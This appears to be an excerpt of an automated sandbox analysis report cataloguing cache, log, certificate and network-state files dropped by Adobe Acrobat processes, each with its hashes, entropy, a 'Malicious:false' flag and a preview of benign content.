                                                                                                Entropy (8bit):5.117422556091066
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:7hVhwq2PqLTwi2nKuAl9OmbnIFUt8OhVhC/ZZmw+OhVhC/zkwOqLTwi2nKuAl9Oe:7hVhwv8wZHAahFUt8OhVhEZ/+OhVhEz3
                                                                                                MD5:71E79133BD4791CA1BC0A670775C46B4
                                                                                                SHA1:79BB884E3D2BE2A09A459C04DCDC6CA044BC8C0D
                                                                                                SHA-256:15484323B1645692734520B589E1B57C96C1923BD6EBF895643BFC39B1775497
                                                                                                SHA-512:55DFD4F11FCAA4C6F958915E4C97440ECC101A88B360ABD2202A0E6EA85BA079852FAFCEBDC49D498F258C8744B8C3688728088DCB031051846E633D7FD6261A
                                                                                                Malicious:false
                                                                                                Preview:2024/12/19-06:51:00.200 1e20 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/19-06:51:00.203 1e20 Recovering log #3.2024/12/19-06:51:00.203 1e20 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                                                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:ASCII text
                                                                                                Category:dropped
                                                                                                Size (bytes):290
                                                                                                Entropy (8bit):5.117422556091066
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:7hVhwq2PqLTwi2nKuAl9OmbnIFUt8OhVhC/ZZmw+OhVhC/zkwOqLTwi2nKuAl9Oe:7hVhwv8wZHAahFUt8OhVhEZ/+OhVhEz3
                                                                                                MD5:71E79133BD4791CA1BC0A670775C46B4
                                                                                                SHA1:79BB884E3D2BE2A09A459C04DCDC6CA044BC8C0D
                                                                                                SHA-256:15484323B1645692734520B589E1B57C96C1923BD6EBF895643BFC39B1775497
                                                                                                SHA-512:55DFD4F11FCAA4C6F958915E4C97440ECC101A88B360ABD2202A0E6EA85BA079852FAFCEBDC49D498F258C8744B8C3688728088DCB031051846E633D7FD6261A
                                                                                                Malicious:false
                                                                                                Preview:2024/12/19-06:51:00.200 1e20 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/19-06:51:00.203 1e20 Recovering log #3.2024/12/19-06:51:00.203 1e20 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                                                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:ASCII text
                                                                                                Category:dropped
                                                                                                Size (bytes):334
                                                                                                Entropy (8bit):5.16016337128444
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:7hVhc3q2PqLTwi2nKuAl9Ombzo2jMGIFUt8OhVh5XZmw+OhVh7PckwOqLTwi2nK3:7hVh8v8wZHAa8uFUt8OhVhV/+OhVho5T
                                                                                                MD5:829EC7910F7A5F863D189EC6C09E9CE3
                                                                                                SHA1:E9C33099E42F1CB7511C1A02A38B74E7F3CD15F0
                                                                                                SHA-256:A997E727450451CEACD83F38F4075256CAB39BCCBAA39D7A11FF590562986DD8
                                                                                                SHA-512:D31C84B8BFEC5465698E878CD2E4703B0FEFBF8D6D1CD48427BDC7BF080FCEAE4D9E54D51C8B063C4702F0AE43FC84792566DF09A8BD59E6B79BDF159555CFFB
                                                                                                Malicious:false
                                                                                                Preview:2024/12/19-06:51:00.346 1ee0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/19-06:51:00.373 1ee0 Recovering log #3.2024/12/19-06:51:00.374 1ee0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                                                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:ASCII text
                                                                                                Category:dropped
                                                                                                Size (bytes):334
                                                                                                Entropy (8bit):5.16016337128444
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:7hVhc3q2PqLTwi2nKuAl9Ombzo2jMGIFUt8OhVh5XZmw+OhVh7PckwOqLTwi2nK3:7hVh8v8wZHAa8uFUt8OhVhV/+OhVho5T
                                                                                                MD5:829EC7910F7A5F863D189EC6C09E9CE3
                                                                                                SHA1:E9C33099E42F1CB7511C1A02A38B74E7F3CD15F0
                                                                                                SHA-256:A997E727450451CEACD83F38F4075256CAB39BCCBAA39D7A11FF590562986DD8
                                                                                                SHA-512:D31C84B8BFEC5465698E878CD2E4703B0FEFBF8D6D1CD48427BDC7BF080FCEAE4D9E54D51C8B063C4702F0AE43FC84792566DF09A8BD59E6B79BDF159555CFFB
                                                                                                Malicious:false
                                                                                                Preview:2024/12/19-06:51:00.346 1ee0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/19-06:51:00.373 1ee0 Recovering log #3.2024/12/19-06:51:00.374 1ee0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                                                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\64d55c45-232f-46f6-bbf9-5dffa31faeaa.tmp

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:JSON data
                                                                                                Category:modified
                                                                                                Size (bytes):475
                                                                                                Entropy (8bit):4.966161562168669
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:YH/um3RA8sqadUJksBdOg2H96caq3QYiub5P7E4TX:Y2sRdsxdUJJdMHT3QYhbt7n7
                                                                                                MD5:A44BC71EA3085D4F9CC308A5F17C0450
                                                                                                SHA1:5EE7A4A909C4F3F228839309DD5A1BE333AEF1ED
                                                                                                SHA-256:7C1E73404189517FD95E106CD701AEC31F155638B633FF4A7571B0EDD743AAF2
                                                                                                SHA-512:9EEFE99C877A83879D31D5402228A271EDFFFCA7EB6353DE4B2E76D4BDD9A93517826BDB8E9AB44C8825A83CDE509DAC648291786D093E9F64F4CB8443D6A869
                                                                                                Malicious:false
                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379169069306025","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":633101},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.9","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\8f7cc6cb-5723-4699-9f71-d58c6a367ae6.tmp

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):475
                                                                                                Entropy (8bit):4.96165270016851
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:YH/um3RA8sqxpsBdOg2Hl/2caq3QYiub5P7E4TX:Y2sRds+6dMHlR3QYhbt7n7
                                                                                                MD5:ACCB522AE87A739BDC04EB5A34975EEB
                                                                                                SHA1:A41FED54445E729A85E7017A002D4FF6FCAFEC93
                                                                                                SHA-256:C7106DE6A60A389FB9B4BBC9971C9922919583A3C382664F3E78DFDC2A95AE96
                                                                                                SHA-512:5B35F36E3C53CC53F90AEA276934753CAD809640E7447BD9F7AAFF48FD46EFBE5FFDEEBC19770D7D0550E67624AB76571D64525F00B82430534576B3015EFF3B
                                                                                                Malicious:false
                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341057329405343","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":149545},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.9","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):475
                                                                                                Entropy (8bit):4.96165270016851
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:YH/um3RA8sqxpsBdOg2Hl/2caq3QYiub5P7E4TX:Y2sRds+6dMHlR3QYhbt7n7
                                                                                                MD5:ACCB522AE87A739BDC04EB5A34975EEB
                                                                                                SHA1:A41FED54445E729A85E7017A002D4FF6FCAFEC93
                                                                                                SHA-256:C7106DE6A60A389FB9B4BBC9971C9922919583A3C382664F3E78DFDC2A95AE96
                                                                                                SHA-512:5B35F36E3C53CC53F90AEA276934753CAD809640E7447BD9F7AAFF48FD46EFBE5FFDEEBC19770D7D0550E67624AB76571D64525F00B82430534576B3015EFF3B
                                                                                                Malicious:false
                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341057329405343","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":149545},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.9","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF621223.TMP (copy)

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):475
                                                                                                Entropy (8bit):4.96165270016851
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:YH/um3RA8sqxpsBdOg2Hl/2caq3QYiub5P7E4TX:Y2sRds+6dMHlR3QYhbt7n7
                                                                                                MD5:ACCB522AE87A739BDC04EB5A34975EEB
                                                                                                SHA1:A41FED54445E729A85E7017A002D4FF6FCAFEC93
                                                                                                SHA-256:C7106DE6A60A389FB9B4BBC9971C9922919583A3C382664F3E78DFDC2A95AE96
                                                                                                SHA-512:5B35F36E3C53CC53F90AEA276934753CAD809640E7447BD9F7AAFF48FD46EFBE5FFDEEBC19770D7D0550E67624AB76571D64525F00B82430534576B3015EFF3B
                                                                                                Malicious:false
                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341057329405343","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":149545},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.9","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):3878
                                                                                                Entropy (8bit):5.222823239540315
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:GICD8SBCmPAi8j0/8qbGNSwPgGYPx8xRqhm068Oz6Vm32Q:1CDLCmPj8j0/8qKgwPHYPx8xemT8Oz6Q
                                                                                                MD5:7188CF1A7DCC643BACE96D3742E42918
                                                                                                SHA1:80FAF4E5EC73067023AB37BCEB1DB463BB8C3908
                                                                                                SHA-256:EFE66F23A730B2DAD675348BB771718225727B7A9171695140905F79A577466A
                                                                                                SHA-512:5CB6F017E35EBFF2522A59F21B7FF77DD145C50962D0966AB9C4B1E80B63D624BD83C16CDF2BBF0091900DA3359337EAD8AEFFBB3EC4F8FC555C3164F549BAEE
                                                                                                Malicious:false
                                                                                                Preview:*...#................version.1..namespace-W...o................next-map-id.1.Pnamespace-ed11ed50_1515_4296_b27c_721e1e1acdec-https://rna-resource.acrobat.com/.0.w..r................next-map-id.2.Snamespace-f62cae74_b031_4dd2_8c7b_e9ef3858dbf9-https://rna-v2-resource.acrobat.com/.1:M4.r................next-map-id.3.Snamespace-2a2b5482_c0ce_4c74_9fbc_8a8daf6ed72d-https://rna-v2-resource.acrobat.com/.2IE..o................next-map-id.4.Pnamespace-b58dfce7_364b_43da_946b_3d7546a793e5-https://rna-resource.acrobat.com/.3KQ..^...............Pnamespace-ed11ed50_1515_4296_b27c_721e1e1acdec-https://rna-resource.acrobat.com/.xK.^...............Pnamespace-b58dfce7_364b_43da_946b_3d7546a793e5-https://rna-resource.acrobat.com/.i.+a...............Snamespace-f62cae74_b031_4dd2_8c7b_e9ef3858dbf9-https://rna-v2-resource.acrobat.com/Tz.qa...............Snamespace-2a2b5482_c0ce_4c74_9fbc_8a8daf6ed72d-https://rna-v2-resource.acrobat.com/"_.o................next-map-id.5.Pnamespace-7c898a99_566e_4628_b4ec_

                                                                                                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:ASCII text
                                                                                                Category:dropped
                                                                                                Size (bytes):322
                                                                                                Entropy (8bit):5.147239625760769
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:7hVmJ3q2PqLTwi2nKuAl9OmbzNMxIFUt8OhVmjUPZmw+OhVmjUdkwOqLTwi2nKuP:7hV+3v8wZHAa8jFUt8OhVZ/+OhVz5Tw9
                                                                                                MD5:860EF573F9CDAC24631AE3C57A572845
                                                                                                SHA1:DFDC59AB2495135E39ACD34CCCB507C2C8C80504
                                                                                                SHA-256:F6330C98F5356475A3FB642485852C5255E2BF6EC93D03502AB025360D0C4A27
                                                                                                SHA-512:C1F50883931513DDE0C40E90D799228B0AF635D42401E99C59D5A6F5142B1BC89C8153AD8CC42B6936C97D6305C03073C47C828D4B2F370884D9458748435751
                                                                                                Malicious:false
                                                                                                Preview:2024/12/19-06:51:01.084 1ee0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/19-06:51:01.086 1ee0 Recovering log #3.2024/12/19-06:51:01.086 1ee0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                                                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:ASCII text
                                                                                                Category:dropped
                                                                                                Size (bytes):322
                                                                                                Entropy (8bit):5.147239625760769
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:7hVmJ3q2PqLTwi2nKuAl9OmbzNMxIFUt8OhVmjUPZmw+OhVmjUdkwOqLTwi2nKuP:7hV+3v8wZHAa8jFUt8OhVZ/+OhVz5Tw9
                                                                                                MD5:860EF573F9CDAC24631AE3C57A572845
                                                                                                SHA1:DFDC59AB2495135E39ACD34CCCB507C2C8C80504
                                                                                                SHA-256:F6330C98F5356475A3FB642485852C5255E2BF6EC93D03502AB025360D0C4A27
                                                                                                SHA-512:C1F50883931513DDE0C40E90D799228B0AF635D42401E99C59D5A6F5142B1BC89C8153AD8CC42B6936C97D6305C03073C47C828D4B2F370884D9458748435751
                                                                                                Malicious:false
                                                                                                Preview:2024/12/19-06:51:01.084 1ee0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/19-06:51:01.086 1ee0 Recovering log #3.2024/12/19-06:51:01.086 1ee0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                                                C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-241219115105Z-200.bmp

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                                                Category:dropped
                                                                                                Size (bytes):65110
                                                                                                Entropy (8bit):0.6376462682686903
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:Fn1AGmY2nTLKnzN4lu1/4uy47rHMMMxAz:FsY2XQzyQnuc
                                                                                                MD5:1468EB269F45D6EECE72317AF6B1587F
                                                                                                SHA1:AB52469CD54F341F71D8EEA78E5293C597CC2560
                                                                                                SHA-256:56B0D18154217AEBE5F78DAA5DAF7861967BB4B615B7D1FFCDBC3C98C8834393
                                                                                                SHA-512:FFEF2EC31529E6165D9549A150FC8DA65917002B81A8E4747853AC7F51D88B3AC545862D5EB39684064EE600140C9D0BDAA97D14067C01AA24B17419950781FA
                                                                                                Malicious:false
                                                                                                Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 11, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 11
                                                                                                Category:dropped
                                                                                                Size (bytes):86016
                                                                                                Entropy (8bit):4.438473686309516
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:ye+ci5GNiBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:phurVgazUpUTTGt
                                                                                                MD5:B4979EA5818209AAC343603D3EDECF4F
                                                                                                SHA1:7ED431FEB3CFAD1AA0A0E6128F29FB9F19D07A81
                                                                                                SHA-256:84DFB174CC21942432DB9ED73A93C0E199886FB397375ACF08D2BD6EB7D1533B
                                                                                                SHA-512:89EBF997DC39D0D22105E1786C391C85E2A47677EBA2060FF0D817EA66FEA94BCAE8AF5EB441EB62BD5695B2C3C768179508C40F2D672394191789617213B090
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:SQLite Rollback Journal
                                                                                                Category:dropped
                                                                                                Size (bytes):8720
                                                                                                Entropy (8bit):3.7669310233167006
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:7MEIJioyV5ioyxoy1C7oy16oy1nKOioy1noy1AYoy1Wioy1oioykioyBoy1noy1M:7EJu5P2XjBikb9IVXEBodRBkt
                                                                                                MD5:6006949051F91139F12F4FC18C18A6D1
                                                                                                SHA1:CD2B771A54467773ED111D7318023D533321E9D5
                                                                                                SHA-256:C8753B6F53997ACC85662DF2A100F466B2FE304908E0064B96E4569A2C52EA75
                                                                                                SHA-512:490A8BAD25149D6D0F804CB1A462372C50EA49601DD6AB7CB5BB6B9D3F8D1F88B4F55DBE26783207198737A9FEDEFC160689BBCEB824E8F16CBA81C2FF3330A7
                                                                                                Malicious:false
                                                                                                Preview:.... .c......&o................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b.r.l...t...}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:Certificate, Version=3
                                                                                                Category:dropped
                                                                                                Size (bytes):1391
                                                                                                Entropy (8bit):7.705940075877404
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                                MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                                SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                                SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                                SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                                Malicious:false
                                                                                                Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......

                                                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                Category:dropped
                                                                                                Size (bytes):71954
                                                                                                Entropy (8bit):7.996617769952133
                                                                                                Encrypted:true
                                                                                                SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                Malicious:false
                                                                                                Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):192
                                                                                                Entropy (8bit):2.7673182398396405
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:kkFkl0Rl1fllXlE/HT8kRlh/tNNX8RolJuRdxLlGB9lQRYwpDdt:kKtRl2T8sRNMa8RdWBwRd
                                                                                                MD5:23C99C42F02152EB5C5684C694BD6767
                                                                                                SHA1:F893FE48BB7D0389A9FFAB44EC3B95746F3C7469
                                                                                                SHA-256:FA93E9223D99EC5477095FFD31C679211CC5523E95056C0B7DC6525EC90ADAAE
                                                                                                SHA-512:C7729942AE72EA1978D20767F123E07DEA891E5B2436901158BF1E0E6661155B339C3F1597A93F4FC756402C721CE5FD31CE7993F742ECE424AE398C584B3B0A
                                                                                                Malicious:false
                                                                                                Preview:p...... ........G..L.R..(....................................................... ..........W....v...............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

                                                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:data
                                                                                                Category:modified
                                                                                                Size (bytes):328
                                                                                                Entropy (8bit):3.150184159866505
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:kKGT9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:rDnLNkPlE99SNxAhUe/3
                                                                                                MD5:16F99E4A1EBE6A79BCDB37B3CB2F9BE7
                                                                                                SHA1:002150F15F4AE2AABC456974B70114BA07C2D599
                                                                                                SHA-256:71C046A7DAE4A1D547DC9151BAF2F38B6FC049D73ACA0421658705AA6BE721F4
                                                                                                SHA-512:DAE463CD490F74E3AF410DBD582C7B30F72F2058CD824FCAA8D986656BC82D8C78D3A6BD628DAD60860DDAC3436D9B5182B32FA611C269628CA4F7BB6BF16E80
                                                                                                Malicious:false
                                                                                                Preview:p...... .........|._.R..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                                                C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

                                                                                                Download File
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):295
                                                                                                Entropy (8bit):5.318480866805847
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXLgc4mSg1c2LjcWkHvR0Y/oAvJM3g98kUwPeUkwRe9:YvXKXrrT5LjIPcGMbLUkee9
                                                                                                MD5:EA8F56639A8FF04DD6E1E0D7A3BD17E7
                                                                                                SHA1:83E8C2189F76AC375FA03F9151E228244EBE6191
                                                                                                SHA-256:ABFA039D6BA03495F7FD6EA27300DF6F5177A582A00A69C13D78B9CCCE88F1E2
                                                                                                SHA-512:90467BF94BCD490D2FE553DA260F160E78C77AFDA906CD308B097BA39CAEC07D9DE96E4459A654C60F365B5E597EA85AB77D278898466BC30D377AAC65CEBE80
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"f4a298e9-238a-44a9-aba9-a6dd24e1ecbf","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1734784257293,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

